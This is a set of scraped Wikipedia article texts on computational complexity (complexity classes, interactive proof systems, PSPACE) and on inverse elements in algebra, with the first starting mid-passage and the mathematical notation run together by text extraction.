certificates is at least as hard as determining whether a certificate exists, it must follow that if#P=FPthenP=NP(it is not known whether this holds in the reverse, i.e. whetherP=NPimplies#P=FP).[23] Just asFPis the function problem equivalent ofP,FNPis the function problem equivalent ofNP. Importantly,FP=FNPif and only ifP=NP.[24] Promise problemsare a generalization of decision problems in which the input to a problem is guaranteed ("promised") to be from a particular subset of all possible inputs. Recall that with a decision problemL⊆{0,1}∗{\displaystyle L\subseteq \{0,1\}^{*}}, an algorithmM{\displaystyle M}forL{\displaystyle L}must act (correctly) oneveryw∈{0,1}∗{\displaystyle w\in \{0,1\}^{*}}. A promise problem loosens the input requirement onM{\displaystyle M}by restricting the input to some subset of{0,1}∗{\displaystyle \{0,1\}^{*}}. Specifically, a promise problem is defined as a pair of non-intersecting sets(ΠACCEPT,ΠREJECT){\displaystyle (\Pi _{\text{ACCEPT}},\Pi _{\text{REJECT}})}, where:[25] The input to an algorithmM{\displaystyle M}for a promise problem(ΠACCEPT,ΠREJECT){\displaystyle (\Pi _{\text{ACCEPT}},\Pi _{\text{REJECT}})}is thusΠACCEPT∪ΠREJECT{\displaystyle \Pi _{\text{ACCEPT}}\cup \Pi _{\text{REJECT}}}, which is called thepromise. Strings inΠACCEPT∪ΠREJECT{\displaystyle \Pi _{\text{ACCEPT}}\cup \Pi _{\text{REJECT}}}are said tosatisfy the promise.[25]By definition,ΠACCEPT{\displaystyle \Pi _{\text{ACCEPT}}}andΠREJECT{\displaystyle \Pi _{\text{REJECT}}}must be disjoint, i.e.ΠACCEPT∩ΠREJECT=∅{\displaystyle \Pi _{\text{ACCEPT}}\cap \Pi _{\text{REJECT}}=\emptyset }. Within this formulation, it can be seen that decision problems are just the subset of promise problems with the trivial promiseΠACCEPT∪ΠREJECT={0,1}∗{\displaystyle \Pi _{\text{ACCEPT}}\cup \Pi _{\text{REJECT}}=\{0,1\}^{*}}. With decision problems it is thus simpler to simply define the problem as onlyΠACCEPT{\displaystyle \Pi _{\text{ACCEPT}}}(withΠREJECT{\displaystyle \Pi _{\text{REJECT}}}implicitly being{0,1}∗/ΠACCEPT{\displaystyle \{0,1\}^{*}/\Pi _{\text{ACCEPT}}}), which throughout this page is denotedL{\displaystyle L}to emphasize thatΠACCEPT=L{\displaystyle \Pi _{\text{ACCEPT}}=L}is aformal language. Promise problems make for a more natural formulation of many computational problems. For instance, a computational problem could be something like "given aplanar graph, determine whether or not..."[26]This is often stated as a decision problem, where it is assumed that there is some translation schema that takeseverystrings∈{0,1}∗{\displaystyle s\in \{0,1\}^{*}}to a planar graph. However, it is more straightforward to define this as a promise problem in which the input is promised to be a planar graph. Promise problems provide an alternate definition for standard complexity classes of decision problems.P, for instance, can be defined as a promise problem:[27] Classes of decision problems—that is, classes of problems defined as formal languages—thus translate naturally to promise problems, where a languageL{\displaystyle L}in the class is simplyL=ΠACCEPT{\displaystyle L=\Pi _{\text{ACCEPT}}}andΠREJECT{\displaystyle \Pi _{\text{REJECT}}}is implicitly{0,1}∗/ΠACCEPT{\displaystyle \{0,1\}^{*}/\Pi _{\text{ACCEPT}}}. Formulating many basic complexity classes likePas promise problems provides little additional insight into their nature. However, there are some complexity classes for which formulating them as promise problems have been useful to computer scientists. Promise problems have, for instance, played a key role in the study ofSZK(statistical zero-knowledge).[28] The following table shows some of the classes of problems that are considered in complexity theory. If classXis a strictsubsetofY, thenXis shown belowYwith a dark line connecting them. IfXis a subset, but it is unknown whether they are equal sets, then the line is lighter and dotted. Technically, the breakdown into decidable and undecidable pertains more to the study ofcomputability theory, but is useful for putting the complexity classes in perspective.
https://en.wikipedia.org/wiki/Complexity_class#Complexity_classes
Incomputational complexity theory, aninteractive proof systemis anabstract machinethat modelscomputationas the exchange of messages between two parties: aproverand averifier. The parties interact by exchanging messages in order to ascertain whether a givenstringbelongs to alanguageor not. The prover is assumed to possess unlimited computational resources but cannot be trusted, while the verifier has bounded computation power but is assumed to be always honest. Messages are sent between the verifier and prover until the verifier has an answer to the problem and has "convinced" itself that it is correct. All interactive proof systems have two requirements: The specific nature of the system, and so thecomplexity classof languages it can recognize, depends on what sort of bounds are put on the verifier, as well as what abilities it is given—for example, most interactive proof systems depend critically on the verifier's ability to make random choices. It also depends on the nature of the messages exchanged—how many and what they can contain. Interactive proof systems have been found to have some important implications for traditional complexity classes defined using only one machine. The main complexity classes describing interactive proof systems areAMandIP. Every interactive proof system defines aformal languageof stringsL{\displaystyle L}.Soundnessof the proof system refers to the property that no prover can make the verifier accept for the wrong statementy∉L{\displaystyle y\not \in L}except with some small probability. The upper bound of this probability is referred to as thesoundness errorof a proof system. More formally, for every prover(P~){\displaystyle ({\tilde {\mathcal {P}}})}, and everyy∉L{\displaystyle y\not \in L}: for someϵ≪1{\displaystyle \epsilon \ll 1}. As long as the soundness error is bounded by a polynomial fraction of the potential running time of the verifier (i.e.ϵ≤1/poly(|y|){\displaystyle \epsilon \leq 1/\mathrm {poly} (|y|)}), it is always possible to amplify soundness until the soundness error becomesnegligible functionrelative to the running time of the verifier. This is achieved by repeating the proof and accepting only if all proofs verify. Afterℓ{\displaystyle \ell }repetitions, a soundness errorϵ{\displaystyle \epsilon }will be reduced toϵℓ{\displaystyle \epsilon ^{\ell }}.[1] The complexity classNPmay be viewed as a very simple proof system. In this system, the verifier is a deterministic, polynomial-time machine (aPmachine). The protocol is: In the case where a valid proof certificate exists, the prover is always able to make the verifier accept by giving it that certificate. In the case where there is no valid proof certificate, however, the input is not in the language, and no prover, however malicious it is, can convince the verifier otherwise, because any proof certificate will be rejected. Although NP may be viewed as using interaction, it wasn't until 1985 that the concept of computation through interaction was conceived (in the context of complexity theory) by two independent groups of researchers. One approach, byLászló Babai, who published "Trading group theory for randomness",[2]defined theArthur–Merlin(AM) class hierarchy. In this presentation, Arthur (the verifier) is aprobabilistic, polynomial-time machine, while Merlin (the prover) has unbounded resources. The classMAin particular is a simple generalization of the NP interaction above in which the verifier is probabilistic instead of deterministic. Also, instead of requiring that the verifier always accept valid certificates and reject invalid certificates, it is more lenient: This machine is potentially more powerful than an ordinary NPinteraction protocol, and the certificates are no less practical to verify, sinceBPPalgorithms are considered as abstracting practical computation (seeBPP). In apublic coinprotocol, the random choices made by the verifier are made public. They remain private in a private coin protocol. In the same conference where Babai defined his proof system forMA,Shafi Goldwasser,Silvio MicaliandCharles Rackoff[3]published a paper defining the interactive proof systemIP[f(n)]. This has the same machines as theMAprotocol, except thatf(n)roundsare allowed for an input of sizen. In each round, the verifier performs computation and passes a message to the prover, and the prover performs computation and passes information back to the verifier. At the end the verifier must make its decision. For example, in anIP[3] protocol, the sequence would be VPVPVPV, where V is a verifier turn and P is a prover turn. In Arthur–Merlin protocols, Babai defined a similar classAM[f(n)] which allowedf(n) rounds, but he put one extra condition on the machine: the verifier must show the prover all the random bits it uses in its computation. The result is that the verifier cannot "hide" anything from the prover, because the prover is powerful enough to simulate everything the verifier does if it knows what random bits it used. This is called apublic coinprotocol, because the random bits ("coin flips") are visible to both machines. TheIPapproach is called aprivate coinprotocol by contrast. The essential problem with public coins is that if the prover wishes to maliciously convince the verifier to accept a string which is not in the language, it seems like the verifier might be able to thwart its plans if it can hide its internal state from it. This was a primary motivation in defining theIPproof systems. In 1986, Goldwasser andSipser[4]showed, perhaps surprisingly, that the verifier's ability to hide coin flips from the prover does it little good after all, in that an Arthur–Merlin public coin protocol with only two more rounds can recognize all the same languages. The result is that public-coin and private-coin protocols are roughly equivalent. In fact, as Babai shows in 1988,AM[k]=AMfor all constantk, so theIP[k] have no advantage overAM.[5] To demonstrate the power of these classes, consider thegraph isomorphism problem, the problem of determining whether it is possible to permute the vertices of one graph so that it is identical to another graph. This problem is inNP, since the proof certificate is the permutation which makes the graphs equal. It turns out that thecomplementof the graph isomorphism problem, a co-NPproblem not known to be inNP, has anAMalgorithm and the best way to see it is via a private coins algorithm.[6] Private coins may not be helpful, but more rounds of interaction are helpful. If we allow the probabilistic verifier machine and the all-powerful prover to interact for a polynomial number of rounds, we get the class of problems calledIP. In 1992,Adi Shamirrevealed in one of the central results of complexity theory thatIPequalsPSPACE, the class of problems solvable by an ordinarydeterministic Turing machinein polynomial space.[7] If we allow the elements of the system to usequantum computation, the system is called aquantum interactive proof system, and the corresponding complexity class is calledQIP.[8]A series of results culminated in a 2010 breakthrough thatQIP=PSPACE.[9][10] Not only can interactive proof systems solve problems not believed to be inNP, but under assumptions about the existence ofone-way functions, a prover can convince the verifier of the solution without ever giving the verifier information about the solution. This is important when the verifier cannot be trusted with the full solution. At first it seems impossible that the verifier could be convinced that there is a solution when the verifier has not seen a certificate, but such proofs, known aszero-knowledge proofsare in fact believed to exist for all problems inNPand are valuable incryptography. Zero-knowledge proofs were first mentioned in the original 1985 paper onIPby Goldwasser, Micali and Rackoff for specific number theoretic languages. The extent of their power was however shown byOded Goldreich,Silvio MicaliandAvi Wigderson.[6]for all ofNP, and this was first extended byRussell ImpagliazzoandMoti Yungto allIP.[11] One goal ofIP's designers was to create the most powerful possible interactive proof system, and at first it seems like it cannot be made more powerful without making the verifier more powerful and so impractical. Goldwasser et al. overcame this in their 1988 "Multi prover interactive proofs: How to remove intractability assumptions", which defines a variant ofIPcalledMIPin which there aretwoindependent provers.[12]The two provers cannot communicate once the verifier has begun sending messages to them. Just as it's easier to tell if a criminal is lying if he and his partner are interrogated in separate rooms, it's considerably easier to detect a malicious prover trying to trick the verifier into accepting a string not in the language if there is another prover it can double-check with. In fact, this is so helpful that Babai, Fortnow, and Lund were able to show thatMIP=NEXPTIME, the class of all problems solvable by anondeterministicmachine inexponential time, a very large class.[13]NEXPTIME contains PSPACE, and is believed to strictly contain PSPACE. Adding a constant number of additional provers beyond two does not enable recognition of any more languages. This result paved the way for the celebratedPCP theorem, which can be considered to be a "scaled-down" version of this theorem. MIPalso has the helpful property that zero-knowledge proofs for every language inNPcan be described without the assumption of one-way functions thatIPmust make. This has bearing on the design of provably unbreakable cryptographic algorithms.[12]Moreover, aMIPprotocol can recognize all languages inIPin only a constant number of rounds, and if a third prover is added, it can recognize all languages inNEXPTIMEin a constant number of rounds, showing again its power overIP. It is known that for any constantk, a MIP system withkprovers and polynomially many rounds can be turned into an equivalent system with only 2 provers, and a constant number of rounds.[14] While the designers ofIPconsidered generalizations of Babai's interactive proof systems, others considered restrictions. A very useful interactive proof system isPCP(f(n),g(n)), which is a restriction ofMAwhere Arthur can only usef(n) random bits and can only examineg(n) bits of the proof certificate sent by Merlin (essentially usingrandom access). There are a number of easy-to-prove results about variousPCPclasses.⁠PCP(0,poly){\displaystyle {\mathsf {PCP}}(0,{\mathsf {poly}})}⁠, the class of polynomial-time machines with no randomness but access to a certificate, is justNP.⁠PCP(poly,0){\displaystyle {\mathsf {PCP}}({\mathsf {poly}},0)}⁠, the class of polynomial-time machines with access to polynomially many random bits isco-RP. Arora and Safra's first major result was that⁠PCP(log,log)=NP{\displaystyle {\mathsf {PCP}}(\log ,\log )={\mathsf {NP}}}⁠; put another way, if the verifier in theNPprotocol is constrained to choose only⁠O(log⁡n){\displaystyle O(\log n)}⁠bits of the proof certificate to look at, this won't make any difference as long as it has⁠O(log⁡n){\displaystyle O(\log n)}⁠random bits to use.[15] Furthermore, thePCP theoremasserts that the number of proof accesses can be brought all the way down to a constant. That is,⁠NP=PCP(log,O(1)){\displaystyle {\mathsf {NP}}={\mathsf {PCP}}(\log ,O(1))}⁠.[16]They used this valuable characterization ofNPto prove thatapproximation algorithmsdo not exist for the optimization versions of certainNP-completeproblems unlessP = NP. Such problems are now studied in the field known ashardness of approximation.
https://en.wikipedia.org/wiki/Interactive_proof_system
Incomputational complexity theory,PSPACEis the set of alldecision problemsthat can be solved by aTuring machineusing apolynomialamount of space. If we denote by SPACE(f(n)), the set of all problems that can be solved byTuring machinesusingO(f(n)) space for some functionfof the input sizen, then we can define PSPACE formally as[1] It turns out that allowing the Turing machine to benondeterministicdoes not add any extra power. Because ofSavitch's theorem,[2]NPSPACE is equivalent to PSPACE, essentially because a deterministic Turing machine can simulate anondeterministic Turing machinewithout needing much more space (even thoughit may use much more time).[3]Also, thecomplementsof all problems in PSPACE are also in PSPACE, meaning that co-PSPACE = PSPACE.[4] The following relations are known between PSPACE and the complexity classesNL,P,NP,PH,EXPTIMEandEXPSPACE(we use here⊂{\displaystyle \subset }to denote strict containment, meaning a proper subset, whereas⊆{\displaystyle \subseteq }includes the possibility that the two sets are the same): From the third line, it follows that both in the first and in the second line, at least one of the set containments must be strict, but it is not known which. It is widely suspected that all are strict. The containments in the third line are both known to be strict. The first follows from direct diagonalization (thespace hierarchy theorem, NL ⊂ NPSPACE) and the fact that PSPACE = NPSPACE viaSavitch's theorem. The second follows simply from the space hierarchy theorem. The hardest problems in PSPACE are the PSPACE-complete problems. SeePSPACE-completefor examples of problems that are suspected to be in PSPACE but not in NP. The class PSPACE is closed under operationsunion,complementation, andKleene star. An alternative characterization of PSPACE is the set of problems decidable by analternating Turing machinein polynomial time, sometimes called APTIME or just AP.[5] A logical characterization of PSPACE fromdescriptive complexitytheory is that it is the set of problems expressible insecond-order logicwith the addition of atransitive closureoperator. A full transitive closure is not needed; a commutative transitive closure and even weaker forms suffice. It is the addition of this operator that (possibly) distinguishes PSPACE fromPH. A major result of complexity theory is that PSPACE can be characterized as all the languages recognizable by a particularinteractive proof system, the one defining the classIP. In this system, there is an all-powerful prover trying to convince a randomized polynomial-time verifier that a string is in the language. It should be able to convince the verifier with high probability if the string is in the language, but should not be able to convince it except with low probability if the string is not in the language. PSPACE can be characterized as the quantum complexity classQIP.[6] PSPACE is also equal to PCTC, problems solvable by classical computers usingclosed timelike curves,[7]as well as to BQPCTC, problems solvable byquantum computersusing closed timelike curves.[8] A languageBisPSPACE-completeif it is in PSPACE and it is PSPACE-hard, which means for allA∈ PSPACE,A≤PB{\displaystyle A\leq _{\text{P}}B}, whereA≤PB{\displaystyle A\leq _{\text{P}}B}means that there is apolynomial-time many-one reductionfromAtoB. PSPACE-complete problems are of great importance to studying PSPACE problems because they represent the most difficult problems in PSPACE. Finding a simple solution to a PSPACE-complete problem would mean we have a simple solution to all other problems in PSPACE because all PSPACE problems could be reduced to a PSPACE-complete problem.[9] An example of a PSPACE-complete problem is thequantified Boolean formula problem(usually abbreviated toQBForTQBF; theTstands for "true").[9]
https://en.wikipedia.org/wiki/PSPACE
Inmathematics, the concept of aninverse elementgeneralises the concepts ofopposite(−x) andreciprocal(1/x) of numbers. Given anoperationdenoted here∗, and anidentity elementdenotede, ifx∗y=e, one says thatxis aleft inverseofy, and thatyis aright inverseofx. (An identity element is an element such thatx*e=xande*y=yfor allxandyfor which the left-hand sides are defined.[1]) When the operation∗isassociative, if an elementxhas both a left inverse and a right inverse, then these two inverses are equal and unique; they are called theinverse elementor simply theinverse. Often an adjective is added for specifying the operation, such as inadditive inverse,multiplicative inverse, andfunctional inverse. In this case (associative operation), aninvertible elementis an element that has an inverse. In aring, aninvertible element, also called aunit, is an element that is invertible under multiplication (this is not ambiguous, as every element is invertible under addition). Inverses are commonly used ingroups—where every element is invertible, andrings—where invertible elements are also calledunits. They are also commonly used for operations that are not defined for all possible operands, such asinverse matricesandinverse functions. This has been generalized tocategory theory, where, by definition, anisomorphismis an invertiblemorphism. The word 'inverse' is derived fromLatin:inversusthat means 'turned upside down', 'overturned'. This may take its origin from the case offractions, where the (multiplicative) inverse is obtained by exchanging the numerator and the denominator (the inverse ofxy{\displaystyle {\tfrac {x}{y}}}isyx{\displaystyle {\tfrac {y}{x}}}). The concepts ofinverse elementandinvertible elementare commonly defined forbinary operationsthat are everywhere defined (that is, the operation is defined for any two elements of itsdomain). However, these concepts are also commonly used withpartial operations, that is operations that are not defined everywhere. Common examples arematrix multiplication,function compositionand composition ofmorphismsin acategory. It follows that the common definitions ofassociativityandidentity elementmust be extended to partial operations; this is the object of the first subsections. In this section,Xis aset(possibly aproper class) on which a partial operation (possibly total) is defined, which is denoted with∗.{\displaystyle *.} A partial operation isassociativeif for everyx,y,zinXfor which one of the members of the equality is defined; the equality means that the other member of the equality must also be defined. Examples of non-total associative operations aremultiplication of matricesof arbitrary size, andfunction composition. Let∗{\displaystyle *}be a possiblypartialassociative operation on a setX. Anidentity element, or simply anidentityis an elementesuch that for everyxandyfor which the left-hand sides of the equalities are defined. Ifeandfare two identity elements such thate∗f{\displaystyle e*f}is defined, thene=f.{\displaystyle e=f.}(This results immediately from the definition, bye=e∗f=f.{\displaystyle e=e*f=f.}) It follows that a total operation has at most one identity element, and ifeandfare different identities, thene∗f{\displaystyle e*f}is not defined. For example, in the case ofmatrix multiplication, there is onen×nidentity matrixfor every positive integern, and two identity matrices of different size cannot be multiplied together. Similarly,identity functionsare identity elements forfunction composition, and the composition of the identity functions of two different sets are not defined. Ifx∗y=e,{\displaystyle x*y=e,}whereeis an identity element, one says thatxis aleft inverseofy, andyis aright inverseofx. Left and right inverses do not always exist, even when the operation is total and associative. For example, addition is a total associative operation onnonnegative integers, which has0asadditive identity, and0is the only element that has anadditive inverse. This lack of inverses is the main motivation for extending thenatural numbersinto the integers. An element can have several left inverses and several right inverses, even when the operation is total and associative. For example, consider thefunctionsfrom the integers to the integers. Thedoubling functionx↦2x{\displaystyle x\mapsto 2x}has infinitely many left inverses underfunction composition, which are the functions that divide by two the even numbers, and give any value to odd numbers. Similarly, every function that mapsnto either2n{\displaystyle 2n}or2n+1{\displaystyle 2n+1}is a right inverse of the functionn↦⌊n2⌋,{\textstyle n\mapsto \left\lfloor {\frac {n}{2}}\right\rfloor ,}thefloor functionthat mapsnton2{\textstyle {\frac {n}{2}}}orn−12,{\textstyle {\frac {n-1}{2}},}depending whethernis even or odd. More generally, a function has a left inverse forfunction compositionif and only if it isinjective, and it has a right inverse if and only if it issurjective. Incategory theory, right inverses are also calledsections, and left inverses are calledretractions. An element isinvertibleunder an operation if it has a left inverse and a right inverse. In the common case where the operation is associative, the left and right inverse of an element are equal and unique. Indeed, iflandrare respectively a left inverse and a right inverse ofx, then The inverseof an invertible element is its unique left or right inverse. If the operation is denoted as an addition, the inverse, oradditive inverse, of an elementxis denoted−x.{\displaystyle -x.}Otherwise, the inverse ofxis generally denotedx−1,{\displaystyle x^{-1},}or, in the case of acommutativemultiplication1x.{\textstyle {\frac {1}{x}}.}When there may be a confusion between several operations, the symbol of the operation may be added before the exponent, such as inx∗−1.{\displaystyle x^{*-1}.}The notationf∘−1{\displaystyle f^{\circ -1}}is not commonly used forfunction composition, since1f{\textstyle {\frac {1}{f}}}can be used for themultiplicative inverse. Ifxandyare invertible, andx∗y{\displaystyle x*y}is defined, thenx∗y{\displaystyle x*y}is invertible, and its inverse isy−1x−1.{\displaystyle y^{-1}x^{-1}.} An invertiblehomomorphismis called anisomorphism. Incategory theory, an invertiblemorphismis also called anisomorphism. Agroupis asetwith anassociative operationthat has an identity element, and for which every element has an inverse. Thus, the inverse is afunctionfrom the group to itself that may also be considered as an operation ofarityone. It is also aninvolution, since the inverse of the inverse of an element is the element itself. A group mayacton a set astransformationsof this set. In this case, the inverseg−1{\displaystyle g^{-1}}of a group elementg{\displaystyle g}defines a transformation that is the inverse of the transformation defined byg,{\displaystyle g,}that is, the transformation that "undoes" the transformation defined byg.{\displaystyle g.} For example, theRubik's cube grouprepresents the finite sequences of elementary moves. The inverse of such a sequence is obtained by applying the inverse of each move in the reverse order. Amonoidis a set with anassociative operationthat has anidentity element. Theinvertible elementsin a monoid form agroupunder monoid operation. Aringis a monoid for ring multiplication. In this case, the invertible elements are also calledunitsand form thegroup of unitsof the ring. If a monoid is notcommutative, there may exist non-invertible elements that have a left inverse or a right inverse (not both, as, otherwise, the element would be invertible). For example, the set of thefunctionsfrom a set to itself is a monoid underfunction composition. In this monoid, the invertible elements are thebijective functions; the elements that have left inverses are theinjective functions, and those that have right inverses are thesurjective functions. Given a monoid, one may want extend it by adding inverse to some elements. This is generally impossible for non-commutative monoids, but, in a commutative monoid, it is possible to add inverses to the elements that have thecancellation property(an elementxhas the cancellation property ifxy=xz{\displaystyle xy=xz}impliesy=z,{\displaystyle y=z,}andyx=zx{\displaystyle yx=zx}impliesy=z{\displaystyle y=z}).This extension of a monoid is allowed byGrothendieck groupconstruction. This is the method that is commonly used for constructingintegersfromnatural numbers,rational numbersfromintegersand, more generally, thefield of fractionsof anintegral domain, andlocalizationsofcommutative rings. Aringis analgebraic structurewith two operations,additionandmultiplication, which are denoted as the usual operations on numbers. Under addition, a ring is anabelian group, which means that addition iscommutativeandassociative; it has an identity, called theadditive identity, and denoted0; and every elementxhas an inverse, called itsadditive inverseand denoted−x. Because of commutativity, the concepts of left and right inverses are meaningless since they do not differ from inverses. Under multiplication, a ring is amonoid; this means that multiplication is associative and has an identity called themultiplicative identityand denoted1. Aninvertible elementfor multiplication is called aunit. The inverse ormultiplicative inverse(for avoiding confusion with additive inverses) of a unitxis denotedx−1,{\displaystyle x^{-1},}or, when the multiplication is commutative,1x.{\textstyle {\frac {1}{x}}.} The additive identity0is never a unit, except when the ring is thezero ring, which has0as its unique element. If0is the only non-unit, the ring is afieldif the multiplication is commutative, or adivision ringotherwise. In anoncommutative ring(that is, a ring whose multiplication is not commutative), a non-invertible element may have one or several left or right inverses. This is, for example, the case of thelinear functionsfrom aninfinite-dimensional vector spaceto itself. Acommutative ring(that is, a ring whose multiplication is commutative) may be extended by adding inverses to elements that are notzero divisors(that is, their product with a nonzero element cannot be0). This is the process oflocalization, which produces, in particular, the field ofrational numbersfrom the ring of integers, and, more generally, thefield of fractionsof anintegral domain. Localization is also used with zero divisors, but, in this case the original ring is not asubringof the localisation; instead, it is mapped non-injectively to the localization. Matrix multiplicationis commonly defined formatricesover afield, and straightforwardly extended to matrices overrings,rngsandsemirings. However,in this section, only matrices over acommutative ringare considered, because of the use of the concept ofrankanddeterminant. IfAis am×nmatrix (that is, a matrix withmrows andncolumns), andBis ap×qmatrix, the productABis defined ifn=p, and only in this case. Anidentity matrix, that is, an identity element for matrix multiplication is asquare matrix(same number for rows and columns) whose entries of themain diagonalare all equal to1, and all other entries are0. Aninvertible matrixis an invertible element under matrix multiplication. A matrix over a commutative ringRis invertible if and only if its determinant is aunitinR(that is, is invertible inR. In this case, itsinverse matrixcan be computed withCramer's rule. IfRis a field, the determinant is invertible if and only if it is not zero. As the case of fields is more common, one see often invertible matrices defined as matrices with a nonzero determinant, but this is incorrect over rings. In the case ofinteger matrices(that is, matrices with integer entries), an invertible matrix is a matrix that has an inverse that is also an integer matrix. Such a matrix is called aunimodular matrixfor distinguishing it from matrices that are invertible over thereal numbers. A square integer matrix is unimodular if and only if its determinant is1or−1, since these two numbers are the only units in the ring of integers. A matrix has a left inverse if and only if its rank equals its number of columns. This left inverse is not unique except for square matrices where the left inverse equal the inverse matrix. Similarly, a right inverse exists if and only if the rank equals the number of rows; it is not unique in the case of a rectangular matrix, and equals the inverse matrix in the case of a square matrix. Compositionis apartial operationthat generalizes tohomomorphismsofalgebraic structuresandmorphismsofcategoriesinto operations that are also calledcomposition, and share many properties with function composition. In all the case, composition isassociative. Iff:X→Y{\displaystyle f\colon X\to Y}andg:Y′→Z,{\displaystyle g\colon Y'\to Z,}the compositiong∘f{\displaystyle g\circ f}is defined if and only ifY′=Y{\displaystyle Y'=Y}or, in the function and homomorphism cases,Y⊂Y′.{\displaystyle Y\subset Y'.}In the function and homomorphism cases, this means that thecodomainoff{\displaystyle f}equals or is included in thedomainofg. In the morphism case, this means that thecodomainoff{\displaystyle f}equals thedomainofg. There is anidentityidX:X→X{\displaystyle \operatorname {id} _{X}\colon X\to X}for every objectX(set, algebraic structure orobject), which is called also anidentity functionin the function case. A function is invertible if and only if it is abijection. An invertible homomorphism or morphism is called anisomorphism. An homomorphism of algebraic structures is an isomorphism if and only if it is a bijection. The inverse of a bijection is called aninverse function. In the other cases, one talks ofinverse isomorphisms. A function has a left inverse or a right inverse if and only it isinjectiveorsurjective, respectively. An homomorphism of algebraic structures that has a left inverse or a right inverse is respectively injective or surjective, but the converse is not true in some algebraic structures. For example, the converse is true forvector spacesbut not formodulesover a ring: a homomorphism of modules that has a left inverse of a right inverse is called respectively asplit epimorphismor asplit monomorphism. This terminology is also used for morphisms in any category. LetS{\displaystyle S}be a unitalmagma, that is, asetwith abinary operation∗{\displaystyle *}and anidentity elemente∈S{\displaystyle e\in S}. If, fora,b∈S{\displaystyle a,b\in S}, we havea∗b=e{\displaystyle a*b=e}, thena{\displaystyle a}is called aleft inverseofb{\displaystyle b}andb{\displaystyle b}is called aright inverseofa{\displaystyle a}. If an elementx{\displaystyle x}is both a left inverse and a right inverse ofy{\displaystyle y}, thenx{\displaystyle x}is called atwo-sided inverse, or simply aninverse, ofy{\displaystyle y}. An element with a two-sided inverse inS{\displaystyle S}is calledinvertibleinS{\displaystyle S}. An element with an inverse element only on one side isleft invertibleorright invertible. Elements of a unital magma(S,∗){\displaystyle (S,*)}may have multiple left, right or two-sided inverses. For example, in the magma given by the Cayley table the elements 2 and 3 each have two two-sided inverses. A unital magma in which all elements are invertible need not be aloop. For example, in the magma(S,∗){\displaystyle (S,*)}given by theCayley table every element has a unique two-sided inverse (namely itself), but(S,∗){\displaystyle (S,*)}is not a loop because the Cayley table is not aLatin square. Similarly, a loop need not have two-sided inverses. For example, in the loop given by the Cayley table the only element with a two-sided inverse is the identity element 1. If the operation∗{\displaystyle *}isassociativethen if an element has both a left inverse and a right inverse, they are equal. In other words, in amonoid(an associative unital magma) every element has at most one inverse (as defined in this section). In a monoid, the set of invertible elements is agroup, called thegroup of unitsofS{\displaystyle S}, and denoted byU(S){\displaystyle U(S)}orH1. The definition in the previous section generalizes the notion of inverse in group relative to the notion of identity. It's also possible, albeit less obvious, to generalize the notion of an inverse by dropping the identity element but keeping associativity; that is, in asemigroup. In a semigroupSan elementxis called(von Neumann) regularif there exists some elementzinSsuch thatxzx=x;zis sometimes called apseudoinverse. An elementyis called (simply) aninverseofxifxyx=xandy=yxy. Every regular element has at least one inverse: ifx=xzxthen it is easy to verify thaty=zxzis an inverse ofxas defined in this section. Another easy to prove fact: ifyis an inverse ofxthene=xyandf=yxareidempotents, that isee=eandff=f. Thus, every pair of (mutually) inverse elements gives rise to two idempotents, andex=xf=x,ye=fy=y, andeacts as a left identity onx, whilefacts a right identity, and the left/right roles are reversed fory. This simple observation can be generalized usingGreen's relations: every idempotentein an arbitrary semigroup is a left identity forReand right identity forLe.[2]An intuitive description of this fact is that every pair of mutually inverse elements produces a local left identity, and respectively, a local right identity. In a monoid, the notion of inverse as defined in the previous section is strictly narrower than the definition given in this section. Only elements in the Green classH1have an inverse from the unital magma perspective, whereas for any idempotente, the elements ofHehave an inverse as defined in this section. Under this more general definition, inverses need not be unique (or exist) in an arbitrary semigroup or monoid. If all elements are regular, then the semigroup (or monoid) is called regular, and every element has at least one inverse. If every element has exactly one inverse as defined in this section, then the semigroup is called aninverse semigroup. Finally, an inverse semigroup with only one idempotent is a group. An inverse semigroup may have anabsorbing element0 because 000 = 0, whereas a group may not. Outside semigroup theory, a unique inverse as defined in this section is sometimes called aquasi-inverse. This is generally justified because in most applications (for example, all examples in this article) associativity holds, which makes this notion a generalization of the left/right inverse relative to an identity (seeGeneralized inverse). A natural generalization of the inverse semigroup is to define an (arbitrary) unary operation ° such that (a°)° =afor allainS; this endowsSwith a type ⟨2,1⟩ algebra. A semigroup endowed with such an operation is called aU-semigroup. Although it may seem thata° will be the inverse ofa, this is not necessarily the case. In order to obtain interesting notion(s), the unary operation must somehow interact with the semigroup operation. Two classes ofU-semigroups have been studied:[3] Clearly a group is both anI-semigroup and a *-semigroup. A class of semigroups important in semigroup theory arecompletely regular semigroups; these areI-semigroups in which one additionally hasaa° =a°a; in other words every element has commuting pseudoinversea°. There are few concrete examples of such semigroups however; most arecompletely simple semigroups. In contrast, a subclass of *-semigroups, the*-regular semigroups(in the sense of Drazin), yield one of best known examples of a (unique) pseudoinverse, theMoore–Penrose inverse. In this case however the involutiona* is not the pseudoinverse. Rather, the pseudoinverse ofxis the unique elementysuch thatxyx=x,yxy=y, (xy)* =xy, (yx)* =yx. Since *-regular semigroups generalize inverse semigroups, the unique element defined this way in a *-regular semigroup is called thegeneralized inverseorMoore–Penrose inverse. All examples in this section involve associative operators. The lower and upper adjoints in a (monotone)Galois connection,LandGare quasi-inverses of each other; that is,LGL=LandGLG=Gand one uniquely determines the other. They are not left or right inverses of each other however. Asquare matrixM{\displaystyle M}with entries in afieldK{\displaystyle K}is invertible (in the set of all square matrices of the same size, undermatrix multiplication) if and only if itsdeterminantis different from zero. If the determinant ofM{\displaystyle M}is zero, it is impossible for it to have a one-sided inverse; therefore a left inverse or right inverse implies the existence of the other one. Seeinvertible matrixfor more. More generally, a square matrix over acommutative ringR{\displaystyle R}is invertibleif and only ifits determinant is invertible inR{\displaystyle R}. Non-square matrices offull rankhave several one-sided inverses:[4] The left inverse can be used to determine the least norm solution ofAx=b{\displaystyle Ax=b}, which is also theleast squaresformula forregressionand is given byx=(ATA)−1ATb.{\displaystyle x=\left(A^{\text{T}}A\right)^{-1}A^{\text{T}}b.} Norank deficientmatrix has any (even one-sided) inverse. However, the Moore–Penrose inverse exists for all matrices, and coincides with the left or right (or true) inverse when it exists. As an example of matrix inverses, consider: So, asm<n, we have a right inverse,Aright−1=AT(AAT)−1.{\displaystyle A_{\text{right}}^{-1}=A^{\text{T}}\left(AA^{\text{T}}\right)^{-1}.}By components it is computed as The left inverse doesn't exist, because which is asingular matrix, and cannot be inverted.
https://en.wikipedia.org/wiki/Invertible_element#In_the_integers_mod_n
